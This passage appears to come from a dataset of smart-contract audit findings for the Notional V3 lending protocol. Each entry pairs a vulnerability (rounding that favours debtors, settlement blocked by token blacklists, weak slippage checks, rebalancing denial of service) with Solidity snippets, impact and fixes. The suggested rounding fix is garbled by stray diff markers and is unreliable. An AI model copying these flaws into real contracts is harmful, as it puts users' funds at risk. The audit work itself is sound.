vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in 
this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n" +convertFromStorage() fails to use rounding-up when converting a negative storedCashBalance into signedPrimeSupplyValue.,medium,"`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`.\\n`convertFromStorage()` is used to convert `storedCashBalance` into `signedPrimeSupplyValue`. When `storedCashBalance` is negative, it represents a debt - positive prime cash owed.\\nUnfortunately, when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`, the following division will apply a rounding-down (near zero) mode, leading to a user to owe less than it is supposed to be.\\n```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n\\nThis is not acceptable. 
Typically, rounding should be in favor of the protocol, not in favor of the user to prevent draining of the protocol and losing funds of the protocol.\\nThe following POC shows a rounding-down will happen for a negative value division. The result of the following test is -3.\\n```\\nfunction testMod() public {\\n \\n int256 result = -14;\\n result = result / 4;\\n console2.logInt(result);\\n }\\n```\\n","Use rounding-up instead.\\n```\\nfunction convertFromStorage(\\n PrimeRate memory pr,\\n int256 storedCashBalance\\n ) internal pure returns (int256 signedPrimeSupplyValue) {\\n if (storedCashBalance >= 0) {\\n return storedCashBalance;\\n } else {\\n // Convert negative stored cash balance to signed prime supply value\\n // signedPrimeSupply = (negativePrimeDebt * debtFactor) / supplyFactor\\n\\n // cashBalance is stored as int88, debt factor is uint80 * uint80 so there\\n // is no chance of phantom overflow (88 // Add the line below\\n 80 // Add the line below\\n 80 = 248) on mul\\n// Remove the line below\\n return storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n// Add the line below\\n return (storedCashBalance.mul(pr.debtFactor).sub(pr.supplyFactor// Remove the line below\\n1)).div(pr.supplyFactor);\\n }\\n }\\n```\\n","`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`. The protocol is losing some dusts amount, but it can be accumulative or a vulnerability that can be exploited.",```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n +Cannot permissionless settle the vault account if the user use a blacklisted account,medium,"Cannot permissionless settle the vault account if the user use a blacklisted account\\nIn VaultAccoutnAction.sol, one of the critical function is\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. 
This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nas the comment suggests, this function should be callable permissionlessly\\nand the comment is, which means it should not be possible to permissionlessly block account settlement\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nthis is calling\\n```\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n```\\n\\nwhich calls\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. 
All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n```\\n\\nbasically this calls\\n```\\n // Calculates the net settled cash if there is any temp cash balance that is net off\\n // against the settled prime debt.\\n bool didTransferPrimary;\\n (accountPrimeStorageValue, didTransferPrimary) = repayAccountPrimeDebtAtSettlement(\\n vaultConfig.primeRate,\\n primeVaultState,\\n vaultConfig.borrowCurrencyId,\\n vaultConfig.vault,\\n vaultAccount.account,\\n vaultAccount.tempCashBalance,\\n accountPrimeStorageValue\\n );\\n```\\n\\ncalling\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if 
(netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n```\\n\\nthe token withdrawal logic above try to push ETH to accout\\n```\\nTokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n);\\n```\\n\\nthis is calling\\n```\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, 
withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nnote the function call\\n```\\nif (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n} else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n}\\n```\\n\\nif the token type is not ETHER,\\nwe are transfer the underlying ERC20 token to the account\\n```\\nGenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n```\\n\\nthe token in-scoped is\\n```\\nERC20: Any Non-Rebasing token. ex. USDC, DAI, USDT (future), wstETH, WETH, WBTC, FRAX, CRV, etc.\\n```\\n\\nUSDC is common token that has blacklisted\\nif the account is blacklisted, the transfer would revert and the account cannot be settled!",maybe let admin bypass the withdrawPrimeCash and force settle the account to not let settlement block further action!,"what are the impact,\\nper comment\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nif that is too vague, I can list three, there are more!\\nthere are certain action that need to be done after the vault settlement, for example, liqudation require the vault settlement first\\nthere are case that require force vault settlement, actually one example is notional need to force the settle the vault during migration! (this is just the case to show user should be able to permissionless reject settlement)","```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. 
In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n" +getAccountPrimeDebtBalance() always return 0,medium,"Spelling errors that result in `getAccountPrimeDebtBalance()` Always return 0\\n`getAccountPrimeDebtBalance()` use for Show current debt\\n```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n\\nIn the above code we can see that due to a spelling error, `debtBalance` always ==0 should use `debtBalance = cashBalance < 0 ? cashBalance : 0;`","```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n- debtBalance = cashBalance < 0 ? debtBalance : 0;\\n+ debtBalance = cashBalance < 0 ? 
cashBalance : 0;\\n }\\n```\\n","`getAccountPrimeDebtBalance()` is the external method to check the debt If a third party integrates with notional protocol, this method will be used to determine whether the user has debt or not and handle it accordingly, which may lead to serious errors in the third party's business","```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n" +A single external protocol can DOS rebalancing process,medium,"A failure in an external money market can DOS the entire rebalance process in Notional.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n\\nDuring a rebalance, the `ProportionalRebalancingStrategy` will loop through all the holdings and perform a deposit or redemption against the external market 
of the holdings.\\nAssume that Notional integrates with four (4) external money markets (Aave V2, Aave V3, Compound V3, Morpho). In this case, whenever a rebalance is executed, Notional will interact with all four external money markets.\\n```\\nFile: TreasuryAction.sol\\n function _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n..SNIP..\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\n```\\nFile: TokenHandler.sol\\n function executeMoneyMarketRedemptions(\\n..SNIP..\\n for (uint256 j; j < data.targets.length; j++) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n```\\n\\nHowever, as long as one external money market reverts, the entire rebalance process will be reverted and Notional would not be able to rebalance its underlying assets.\\nThe call to the external money market can revert due to many reasons, which include the following:\\nChanges in the external protocol's interfaces (e.g. function signatures modified or functions added or removed)\\nThe external protocol is paused\\nThe external protocol has been compromised\\nThe external protocol suffers from an upgrade failure causing an error in the new contract code.","Consider implementing a more resilient rebalancing process that allows for failures in individual external money markets. For instance, Notional could catch reverts from individual money markets and continue the rebalancing process with the remaining markets.","Notional would not be able to rebalance its underlying holding if one of the external money markets causes a revert. 
The probability of this issue occurring increases whenever Notional integrates with a new external money market.\\nThe key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its funds out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.","```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n" +Inadequate
slippage control,medium,"The current slippage control mechanism checks a user's acceptable interest rate limit against the post-trade rate, which could result in trades proceeding at rates exceeding the user's defined limit.\\n```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n\\nWhen executing a fCash trade, the interest rate is computed based on the utilization of the current market (Refer to Line 432). The `postFeeInterestRate` is then computed based on the `preFeeCashToAccount` and trading fee, and this rate will be used to derive the exchange rate needed to convert `fCashToAccount` to the net prime cash (postFeeCashToAccount).\\nNote that the interest rate used for the trade is `postFeeInterestRate`, and `postFeeCashToAccount` is the amount of cash credit or debit to an account.\\nIf there is any slippage control in place, the slippage should be checked against the `postFeeInterestRate` or `postFeeCashToAccount`. 
As such, there are two approaches to implementing slippage controls:\\n1st Approach - The current interest rate is `2%`. User sets their acceptable interest rate limit at 3% when the user submits the trade transaction. The user's tolerance is `1%`. From the time the trade is initiated to when it's executed, the rate (postFeeInterestRate) rises to 5%, the transaction should revert due to the increased slippage beyond the user's tolerance.\\n2nd Approach - If a user sets the minimum trade return of 1000 cash, but the return is only 900 cash (postFeeCashToAccount) when the trade is executed, the transaction should revert as it exceeded the user's slippage tolerance\\nNote: When users submit a trade transaction, the transaction is held in the mempool for a period of time before executing, and thus the market condition and interest rate might change during this period, and slippage control is used to protect users from these fluctuations.\\nHowever, within the codebase, it was observed that the slippage was not checked against the `postFeeInterestRate` or `postFeeCashToAccount`.\\n```\\nFile: InterestRateCurve.sol\\n // returns the net cash amounts to apply to each of the three relevant balances.\\n (\\n int256 netUnderlyingToAccount,\\n int256 netUnderlyingToMarket,\\n int256 netUnderlyingToReserve\\n ) = _getNetCashAmountsUnderlying(\\n irParams,\\n market,\\n cashGroup,\\n totalCashUnderlying,\\n fCashToAccount,\\n timeToMaturity\\n );\\n..SNIP..\\n {\\n // Do not allow utilization to go above 100 on trading, calculate the utilization after\\n // the trade has taken effect, meaning that fCash changes and cash changes are applied to\\n // the market totals.\\n market.totalfCash = market.totalfCash.subNoNeg(fCashToAccount);\\n totalCashUnderlying = totalCashUnderlying.add(netUnderlyingToMarket);\\n\\n uint256 utilization = getfCashUtilization(0, market.totalfCash, totalCashUnderlying);\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0);\\n\\n uint256 
newPreFeeImpliedRate = getInterestRate(irParams, utilization);\\n..SNIP..\\n // Saves the preFeeInterestRate and fCash\\n market.lastImpliedRate = newPreFeeImpliedRate;\\n }\\n```\\n\\nAfter computing the net prime cash (postFeeCashToAccount == netUnderlyingToAccount) at Line 373 above, it updates the `market.totalfCash` and `totalCashUnderlying`. Line 395 computes the `utilization` after the trade happens, and uses the latest `utilization` to compute the new interest rate after the trade and save it within the `market.lastImpliedRate`\\n```\\nFile: TradingAction.sol\\n function _executeLendBorrowTrade(\\n..SNIP..\\n cashAmount = market.executeTrade(\\n account,\\n cashGroup,\\n fCashAmount,\\n market.maturity.sub(blockTime),\\n marketIndex\\n );\\n\\n uint256 rateLimit = uint256(uint32(bytes4(trade << 104)));\\n if (rateLimit != 0) {\\n if (tradeType == TradeActionType.Borrow) {\\n // Do not allow borrows over the rate limit\\n require(market.lastImpliedRate <= rateLimit, ""Trade failed, slippage"");\\n } else {\\n // Do not allow lends under the rate limit\\n require(market.lastImpliedRate >= rateLimit, ""Trade failed, slippage"");\\n }\\n }\\n }\\n```\\n\\nThe trade is executed at Line 256 above. After the trade is executed, it will check for the slippage at Line 264-273 above.\\nLet $IR_1$ be the interest rate used during the trade (postFeeInterestRate), $IR_2$ be the interest rate after the trade (market.lastImpliedRate), and $IR_U$ be the user's acceptable interest rate limit (rateLimit).\\nBased on the current slippage control implementation, $IR_U$ is checked against $IR_2$. Since the purpose of having slippage control in DeFi trade is to protect users from unexpected and unfavorable price changes during the execution of a trade, $IR_1$ should be used instead.\\nAssume that at the time of executing a trade (TradeActionType.Borrow), $IR_1$ spikes up and exceeds $IR_U$. 
However, since the slippage control checks $IR_U$ against $IR_2$, which may have resettled to $IR_U$ or lower, the transaction proceeds despite exceeding the user's acceptable rate limit. So, the transaction succeeds without a revert.\\nThis issue will exacerbate when executing large trades relative to pool liquidity.",Consider updating the slippage control to compare the user's acceptable interest rate limit (rateLimit) against the interest rate used during the trade execution (postFeeInterestRate).,"The existing slippage control does not provide the desired protection against unexpected interest rate fluctuations during the transaction. As a result, users might be borrowing at a higher cost or lending at a lower return than they intended, leading to losses.","```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n" +Inconsistent use of `VAULT_ACCOUNT_MIN_TIME` in vault implementation,medium,"There is a considerable difference in implementation 
behaviour when a vault has yet to mature compared to after vault settlement.\\nThere is some questionable functionality with the following `require` statement:\\n```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n\\nThe `lastUpdateBlockTime` variable is updated in two cases:\\nA user enters a vault position, updating the vault state; including `lastUpdateBlockTime`. This is a proactive measure to prevent users from quickly entering and exiting the vault.\\nThe vault has matured and as a result, each time vault fees are assessed for a given vault account, `lastUpdateBlockTime` is updated to `block.timestamp` after calculating the pro-rated fee for the prime cash vault.\\nTherefore, before a vault has matured, it is not possible to quickly enter and exit a vault. But after `Constants.VAULT_ACCOUNT_MIN_TIME` has passed, the user can exit the vault as many times as they like. However, the same does not hold true once a vault has matured. Each time a user exits the vault, they must wait `Constants.VAULT_ACCOUNT_MIN_TIME` time again to re-exit. This seems like inconsistent behaviour.","It might be worth adding an exception to `VaultConfiguration.settleAccountOrAccruePrimeCashFees()` so that when vault fees are calculated, `lastUpdatedBlockTime` is not updated to `block.timestamp`.",The `exitVault()` function will ultimately affect prime and non-prime vault users differently. 
It makes sense for the codebase to be written in such a way that functions execute in-line with user expectations.,```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n +Return data from the external call not verified during deposit and redemption,medium,"The deposit and redemption functions did not verify the return data from the external call, which might cause the contract to wrongly assume that the deposit/redemption went well although the action has actually failed in the background.\\n```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n\\nWhen the external call within the `GenericToken.executeLowLevelCall` function reverts, the `status` returned from the `.call` will be `false`. In this case, Line 69 above will revert.\\n```\\nFile: TreasuryAction.sol\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\nFor deposit and redeem, Notional assumes that all money markets will revert if the deposit/mint and redeem/burn has an error. Thus, it does not verify the return data from the external call. Refer to the comment in Line 317 above.\\nHowever, this is not always true due to the following reasons:\\nSome money markets might not revert when errors occur but instead return `false (0)`. 
In this case, the current codebase will wrongly assume that the deposit/redemption went well although the action has failed.\\nCompound might upgrade its contracts to return errors instead of reverting in the future.","Consider checking the `returnData` to ensure that the external money market returns a successful response after deposit and redemption.\\nNote that the successful response returned from various money markets might be different. Some protocols return `1` on a successful action, while Compound return zero (NO_ERROR).","The gist of prime cash is to integrate with multiple markets. Thus, the codebase should be written in a manner that can handle multiple markets. Otherwise, the contract will wrongly assume that the deposit/redemption went well although the action has actually failed in the background, which might potentially lead to some edge cases where assets are sent to the users even though the redemption fails.","```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n" +Treasury rebalance will fail due to interest accrual,medium,"If Compound has updated their interest rate model, then Notional will calculate the before total underlying token balance without accruing interest. 
If this exceeds `Constants.REBALANCING_UNDERLYING_DELTA`, then rebalance execution will revert.\\nThe `TreasuryAction._executeRebalance()` function will revert on a specific edge case where `oracle.getTotalUnderlyingValueStateful()` does not accrue interest before calculating the value of the treasury's `cToken` holdings.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\n`cTokenAggregator.getExchangeRateView()` returns the exchange rate which is used to calculate the underlying value of `cToken` holdings in two ways:\\nIf the interest rate model is unchanged, then we correctly accrue interest by calculating it without mutating state.\\nIf the interest rate model HAS changed, then we query `cToken.exchangeRateStored()` which DOES NOT accrue interest.\\n```\\nFile: cTokenAggregator.sol\\n function getExchangeRateView() external view override returns (int256) {\\n // Return stored exchange rate if interest rate model is updated.\\n // This prevents the function from returning incorrect 
